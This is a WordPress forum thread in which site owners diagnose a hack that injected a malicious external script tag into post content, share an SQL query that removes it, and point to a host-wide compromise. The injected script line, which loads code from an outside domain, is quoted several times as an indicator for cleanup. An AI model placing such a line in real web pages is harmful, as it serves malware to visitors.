Hacked (8 posts)

  1. ianatkins
    Posted 5 years ago #

    Hello All,

    Been enjoying redeveloping a site in version 3.0, until evening of launch, just before switch over. PC users complain of a strange redirect when visiting the dev site.

    The following javascript has been inserted into the top of the wp_posts->post_content database field.

    <script src="http://ae.awaue.com/7"></script>

    This script then loads further malicious code.

    I've checked the template files, all seem fine, and run a text search of the files for the above string.

    Any thoughts, are there any key files to look for malicious code.

    Any way to track down the point of entry?

    It's odd as this site wasn't public, only a couple of people populating content and myself viewing it!?

    (hosted on mediatemple).

    Any help appreciated.

    Ian Atkins.

  2. James Huff
    Volunteer Moderator
    Posted 5 years ago #

    Definitely start by removing that code from the database. This should help with the rest:


    I think that MT reported a system-wide hack issue not too long ago. You might want to contact their support department for more details.

  3. ianatkins
    Posted 5 years ago #

    Yeah been checking that out, and yep the code is removed!

    Thanks for the reply, I'll update here as and when I find out more.

  4. James Huff
    Volunteer Moderator
    Posted 5 years ago #

    You're welcome!

  5. ponyexpress
    Posted 5 years ago #

    I have this exact same problem, but can't find the source of the script. Ian, do you think you could help me out? Stressed.

  6. ianatkins
    Posted 5 years ago #

    If you use phpmyadmin, or another database editor. Run the following query on your wp_posts table.
    update wp_posts set post_content = replace(post_content,'<script src="http://ae.awaue.com/7"></script>','');

    This will delete any instance of the javascript in post content. Have a browse over your database, it might be stored elsewhere aswell.

    As yet I'm still to find any file modifcations but am running exploit scanner at the moment.

  7. themehaus
    Posted 5 years ago #

    ian hit the nail on the head. it's getting inserted in to the tail end of the post_content fields.

    step by step instructions here too: http://bit.ly/d01oei , but it's more or less what ian has posted above.

  8. ianatkins
    Posted 5 years ago #

    Media Temple system status ticket, for anyone else suffering this!


Topic Closed

This topic has been closed to new replies.

About this Topic